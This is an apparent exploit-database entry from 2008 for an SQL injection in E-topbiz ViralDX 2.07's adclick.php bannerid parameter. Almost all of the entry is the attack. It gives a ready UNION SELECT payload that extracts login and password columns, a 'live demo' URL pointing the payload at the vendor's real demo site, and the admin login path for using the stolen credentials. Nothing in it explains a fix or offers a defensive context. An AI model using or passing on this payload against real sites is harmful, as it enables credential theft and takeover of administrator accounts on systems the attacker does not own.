id: 3287
date: 06/23/2008
title: E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability
author: Hussin X
cves: 

========================================================================
E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability
========================================================================



#########################################################
#
#   Viral DX 1  SQL Injection Vulnerability               
#                                               
#========================================================
#    HomE script : http://e-topbiz.com/
#     
#    Demo : http://e-topbiz.com/trafficdemos/viraldx1/  
#    
#
##########################################################

Exploit:   

http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws

(0x3a,login,pass)+from+pass--



L!VE DEMO:

http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-

1+union+select+concat_ws(0x3a,login,pass)+from+pass--


LoGiN :

/admin/login.php




#  0day.today [2023-03-26]  #